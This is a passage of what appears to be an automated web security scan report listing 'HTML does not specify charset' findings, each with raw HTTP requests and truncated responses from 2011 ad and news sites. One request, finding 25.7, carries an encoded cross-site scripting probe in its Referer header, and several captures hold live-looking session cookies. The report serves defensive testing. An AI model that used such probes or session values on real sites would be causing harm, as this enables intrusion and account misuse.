User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1124; path=/
Date: Sun, 04 Sep 2011 00:47:40 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 301119

<line>
   <start_x>982.22222222222</start_x>
   <start_y>205.31944444444</start_y>
   <end_x>984.10617777778</end_x>
   <end_y>212.28597238889</end_y>
   <ctrl_x>986.6642</ctrl_x>
   <ctrl_y>211.80270841667</ctrl
...[SNIP]...

24.5. https://www.sprint.net/performance/gen_pop_xml.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/gen_pop_xml.php

Request

GET /performance/gen_pop_xml.php HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:47:41 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 91549

<pop>
   <market_full>Nashville, TN</market_full>
   <market_short>nsh</market_short>
   <x>984.14638604058</x>
   <y>221.96406860352</y>
   <color>1</color>
   <region>na</region>
   <position>C</position>
   <probe
...[SNIP]...

25. HTML does not specify charset
There are 25 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


25.1. http://a1128.g.akamai.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: a1128.g.akamai.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 208
Expires: Sun, 04 Sep 2011 01:22:45 GMT
Date: Sun, 04 Sep 2011 01:22:45 GMT
Connection: close

<HTML><HEAD>
<TITLE>Invalid URL</TITLE>
</HEAD><BODY>
<H1>Invalid URL</H1>
The requested URL "&#47;favicon&#46;ico", is invalid.<p>
Reference&#32;&#35;9&#46;8b4a4350&#46;1315099365&#46;9909dac
</BODY>
...[SNIP]...

25.2. http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3093.150834.0497248606521/B5801515.10

Request

GET /adi/N3093.150834.0497248606521/B5801515.10;sz=728x90;ord=2607056080429450331?;click=http://r.turn.com/r/formclick/id/WwSFP7EfLiSMBgkA9QEBAA/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 499
Date: Sun, 04 Sep 2011 00:48:06 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/4/3c/%2a/q
...[SNIP]...

25.3. http://ad.doubleclick.net/adj/sacbee_cim/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/sacbee_cim/

Request

GET /adj/sacbee_cim/;dcove=o;share=partnersoldinvite;sz=24x24;dcmt=text/html;ord=1315097366526? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_4&protocol=http%3A&network=sacbee%3Ablogs_sacbee
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 313
Date: Sun, 04 Sep 2011 00:48:49 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/m;240490578;0-0;1;46669306;3634-24/24;41913949/41931736/1;;~aopt=2/2/95/0;~sscs=%3fhttp://www.meebo.com/blank.h
...[SNIP]...

25.4. http://ad.doubleclick.net/pfadx/mi.sac00/News/State/GovtPolitics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/mi.sac00/News/State/GovtPolitics

Request

GET /pfadx/mi.sac00/News/State/GovtPolitics;dcove=d;lvl6=Product:%20Blogs:%20Moveable%20Type:%20Sacramento%20Bee%20--%20The%20State%20Worker;pl=sectfront;!c=meebo;atf=n;pos=1;sz=100x60;tile=1;dcmt=text/html;ord=0123456789? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1068
DCLK_imp: v7;x;240368085;1-0;0;17382759;100/60;43837061/43854848/1;;~okv=;dcove=d;lvl6=Product: Blogs: Moveable Type: Sacramento Bee -- The State Worker;pl=sectfront;!c=meebo;atf=n;pos=1;sz=100x60;tile=1;dcmt=text/html;~cs=o
Date: Sun, 04 Sep 2011 00:48:38 GMT

MeeboAdPayload = {type: "Partner", ad: {"impression": "http://ad.doubleclick.net/imp;v7;x;240368085;1-0;0;17382759;100/60;43837061/43854848/1;;~okv=;dcove=d;lvl6=Product: Blogs: Moveable Type: Sacrame
...[SNIP]...

25.5. http://content.usatoday.com/asp/uas3/uasSignedOut.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /asp/uas3/uasSignedOut.htm

Request

GET /asp/uas3/uasSignedOut.htm HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D535.1%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; ASPSESSIONIDASQTAAAC=EPNJMMPAKJOIAFKDGAKKCMKG; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; __qca=P0-1950655009-1315096993908; s_cc=true; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Ftopics; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSQQQADDA=OIMLBDFBJFJKOFFOMKLADCDM; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:52:09 GMT
Content-Length: 388

<div class="uasPageElement uasSignedOut">
<span class="uasGreeting">Join USA TODAY &nbsp;</span>
<span class="uasPageControls">
<a class="uasSignIn" href="#SignIn">Sign in</a>
|
<
...[SNIP]...

25.6. http://ds.addthis.com/red/psi/sites/content.usatoday.com/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/content.usatoday.com/p.json

Request

GET /red/psi/sites/content.usatoday.com/p.json?callback=_ate.ad.hpr&uid=4e5e3f1ae3fd7427&url=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Ftopics&ref=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&cb26m7 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; psc=4; uid=4e5e3f1ae3fd7427; uvc=32|35

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 04 Sep 2011 00:51:44 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 04 Oct 2011 00:51:44 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 04 Sep 2011 00:51:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:51:44 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

25.7. http://graphics.cstv.com/store/.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://graphics.cstv.com
Path:   /store/.gif

Request

GET /store/.gif HTTP/1.1
Host: graphics.cstv.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.und.com/sportsb3f73%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E312ccc6a7af/m-footbl/9873956

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cteonnt-Length: 345
Server: lighttpd/1.4.19
Content-Length: 345
Cache-Control: private, max-age=7776000
Date: Sun, 04 Sep 2011 00:56:55 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

25.8. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-2.html

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=4462/5032; rdk15=0; ses15=5032^2&9346^1; csi15=3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:23 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:55:23 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:55:23 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^3&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111876; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3214995.js^3^1315096957^1315097723; expires=Sun, 11-Sep-2011 00:55:23 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1228

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

25.9. http://premium.mookie1.com/2/nbc.com/ac@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /2/nbc.com/ac@Bottom3

Request

GET /2/nbc.com/ac@Bottom3 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5iycEADA/r; NSC_o4_qsfnjvn_efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 230
Content-Type: text/html

<SCRIPT TYPE="text/javascript" language="JavaScript">
var xaval = 'n';
document.write('<iframe src="http://www.nbcudigitaladops.com/hosted/util/setRemoteDomainCookies.html?xa='+xaval+'" width=0 heig
...[SNIP]...

25.10. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

Summary

Severity:   Information
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:25 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:53:35 GMT
Content-Length: 90
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2"}});

25.11. http://view.atdmt.com/SPT/iview/194719689/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /SPT/iview/194719689/direct/01

Request

GET /SPT/iview/194719689/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close
Content-Length: 333

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">
<a href="http://clk.atdmt.com/go/194719689/direct;ai.224945378;ct.1/01" target="_top">
<img src="HTTP://spe.atdmt.com/ds/YUSPTSPR
...[SNIP]...

25.12. http://view.atdmt.com/SPT/iview/194719690/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /SPT/iview/194719690/direct/01

Request

GET /SPT/iview/194719690/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close
Content-Length: 328

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">
<a href="http://clk.atdmt.com/go/194719690/direct;ai.226714311;ct.1/01" target="_top">
<img src="HTTP://spe.atdmt.com/ds/YUSPTSPR
...[SNIP]...

25.13. http://view.atdmt.com/SPT/iview/194719691/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /SPT/iview/194719691/direct/01

Request

GET /SPT/iview/194719691/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close
Content-Length: 317

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">
<a href="http://clk.atdmt.com/go/194719691/direct;ai.231675849;ct.1/01" target="_top">
<img src="HTTP://spe.atdmt.com/ds/YUSPTSPR
...[SNIP]...

25.14. http://view.atdmt.com/SPT/iview/194719692/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /SPT/iview/194719692/direct/01

Request

GET /SPT/iview/194719692/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close
Content-Length: 318

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">
<a href="http://clk.atdmt.com/go/194719692/direct;ai.227792771;ct.1/01" target="_top">
<img src="HTTP://spe.atdmt.com/ds/YUSPTSPR
...[SNIP]...

25.15. http://view.atdmt.com/SPT/iview/194719693/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /SPT/iview/194719693/direct/01

Request

GET /SPT/iview/194719693/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close
Content-Length: 337

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">
<a href="http://clk.atdmt.com/go/194719693/direct;ai.234125290;ct.1/01" target="_top">
<img src="HTTP://spe.atdmt.com/ds/YUSPTSPR
...[SNIP]...

25.16. http://view.atdmt.com/SPT/iview/194719989/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /SPT/iview/194719989/direct/01

Request

GET /SPT/iview/194719989/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close
Content-Length: 298

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">

<a href="http://clk.atdmt.com/go/194719989/direct;ai.224945383;ct.1/01"> </a>

<img src="HTTP://spe.atdmt.com/ds/YUSPTSPRTSPR/
...[SNIP]...

25.17. http://view.atdmt.com/SPT/iview/194719990/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /SPT/iview/194719990/direct/01

Request

GET /SPT/iview/194719990/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:35 GMT
Connection: close
Content-Length: 285

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">
<a href="http://clk.atdmt.com/go/194719990/direct;ai.226715544;ct.1/01"></a>
<img src="HTTP://ec.atdmt.com/ds/YUSPTSPRTSPR/HERO/0
...[SNIP]...

25.18. http://view.atdmt.com/SPT/iview/194719991/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /SPT/iview/194719991/direct/01

Request

GET /SPT/iview/194719991/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close
Content-Length: 288

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">
<a href="http://clk.atdmt.com/go/194719991/direct;ai.228559374;ct.1/01"></a>
<img src="HTTP://spe.atdmt.com/ds/YUSPTSPRTSPR/HERO/
...[SNIP]...

25.19. http://view.atdmt.com/SPT/iview/194719992/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /SPT/iview/194719992/direct/01

Request

GET /SPT/iview/194719992/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
